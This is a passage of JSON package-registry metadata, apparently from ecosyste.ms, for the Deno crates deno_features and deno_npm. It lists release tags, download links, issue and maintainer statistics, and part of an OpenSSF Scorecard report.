.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-28T21:10:49.940Z","dependent_packages_count":0,"downloads":355286,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":94.75903646654517,"dependent_repos_count":22.00071618306494,"dependent_packages_count":29.140633768565976,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":48.63346213939203},"purl":"pkg:cargo/deno_features","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_features","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_features","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_features/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-28T02:34:50.351Z","issues_count":6619,"pull_requests_count":9639,"avg_time_to_close_issue":17209143.875658587,"avg_time_to_close_pull_request":1533351.1008099688,"issues_closed_count":3794,"pull_requests_closed_count":8024,"pull_request_authors_count":580,"issue_authors_count":2470,"avg_comments_per_issue":2.509442513974921,"avg_comments_per_pull_request":0.719680464778504,"merged_pull_requests_count":7006,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":663,"past_year_pull_requests_count":1197,"past_year_avg_time_to_close_issue":1426984.6098654708,"past_year_avg_time_to_close_pull_request":1334468.010687023,"past_year_issues_closed_count":223,"past_year_pull_requests_closed_count":655,"past_year_pull_request_authors_count":184,"past_year_issue_authors_count":365,"past_year_avg_comments_per_issue":1.2428355957767723,"past_year_avg_comments_per_pull_request":1.1161236424394319,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":14,"past_year_merged_pull_requests_count":483,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1795,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":283,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":391,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_features/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_features/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_features/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_features/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_features/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_features/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2025-04-23T08:32:43.884Z","updated_at":"2025-04-23T08:32:43.884Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2025-04-23T08:32:43.948Z","updated_at":"2025-04-23T08:32:43.948Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":7404177,"name":"deno_npm","ecosystem":"cargo","description":"npm registry client and dependency resolver used in the Deno CLI","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":108,"first_release_published_at":"2023-04-05T19:42:17.652Z","latest_release_published_at":"2026-08-27T15:20:49.563Z","latest_release_number":"0.70.0","last_synced_at":"2026-09-07T22:55:14.644Z","created_at":"2023-04-05T20:21:26.637Z","updated_at":"2026-09-07T22:55:14.645Z","registry_url":"https://crates.io/crates/deno_npm/","install_command":"cargo install deno_npm","documentation_url":"https://docs.rs/deno_npm/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: 